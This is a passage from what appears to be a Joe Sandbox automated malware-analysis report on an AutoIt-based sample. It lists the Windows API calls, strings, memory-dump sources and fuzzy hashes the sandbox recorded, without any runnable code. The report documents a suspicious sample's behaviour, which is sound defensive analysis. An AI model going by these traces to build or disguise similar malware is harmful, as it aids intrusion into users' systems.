                                                                                        • Instruction Fuzzy Hash: 83F062B174036C77D2204B16BC46FD23A5DA706BB5F114106F615A61D0D2E09480A6A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 6d813ab470d3997c17e88ad74bbe6979b59f473c9cd76b1771f47c1745ddf4ac
                                                                                        • Instruction ID: 7393cc8e896881dddb573e95eb7e0995c19b799cf4a2a99d511d9e5501eb26d1
                                                                                        • Opcode Fuzzy Hash: 6d813ab470d3997c17e88ad74bbe6979b59f473c9cd76b1771f47c1745ddf4ac
                                                                                        • Instruction Fuzzy Hash: 49E0D877A0432927DB10EBA5EC09E97FFACFB55760F000016F915D3081D6B0E60197D0
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F1A63F
                                                                                          • Part of subcall function 00F013F1: _doexit.LIBCMT ref: 00F013FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        • Opcode ID: 7055f79ddcb42ed1bc21a209be0d73adead43f468110693e5edeb8562c95a31a
                                                                                        • Instruction ID: 23ead47380d3fdc339f5bd5b607eb529707f59ab6c249c5a8cb08ab3362117a8
                                                                                        • Opcode Fuzzy Hash: 7055f79ddcb42ed1bc21a209be0d73adead43f468110693e5edeb8562c95a31a
                                                                                        • Instruction Fuzzy Hash: D1D05B323C532C33D31436A96C17FD575889F15B65F044016FB0CA55C24DD6D98071EA
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00F5ACC0
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F5AEBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 510247158-3257408948
                                                                                        • Opcode ID: 7e158815dac198cd85c99ffd1c2342bf91bbd353c6c19e558e0b590ee9e5cb9f
                                                                                        • Instruction ID: 55fe8fb9379dec657831f7c8c4e3f4458fc5ee194168948441609bef453deba5
                                                                                        • Opcode Fuzzy Hash: 7e158815dac198cd85c99ffd1c2342bf91bbd353c6c19e558e0b590ee9e5cb9f
                                                                                        • Instruction Fuzzy Hash: 84E06571D0010DDFCB11DBA4DD48AECF7B8AB48301F108185E622B2160C7B09A48FF21
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F486E2
                                                                                        • PostMessageW.USER32(00000000), ref: 00F486E9
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 156918923c2f8a1cb9ce0301b0096903a9b85bfa5bdaee7a077da1be3e8da473
                                                                                        • Instruction ID: 85bf0061b56a42ce8e4bfbb9b7b0fdfb97b21de41888cda1796bb951f69d2dd9
                                                                                        • Opcode Fuzzy Hash: 156918923c2f8a1cb9ce0301b0096903a9b85bfa5bdaee7a077da1be3e8da473
                                                                                        • Instruction Fuzzy Hash: 50D0A932B803287BF2246330AC0BFC63A189B08B20F000808F206AA0E0C8E4E9009A15
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F486A2
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F486B5
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: ab96aec1b8e8042630e29e3e5a4f257b10badb04dd2e360bffd13c096b13c231
                                                                                        • Instruction ID: c135b68450755a4e4b44c25a1fa5d4d56103f86a2831e097d78757434c62aba6
                                                                                        • Opcode Fuzzy Hash: ab96aec1b8e8042630e29e3e5a4f257b10badb04dd2e360bffd13c096b13c231
                                                                                        • Instruction Fuzzy Hash: 06D02232B84328B7F2347330EC0BFC63A189B04B20F000808F30AAA0E0C8E4ED00DB10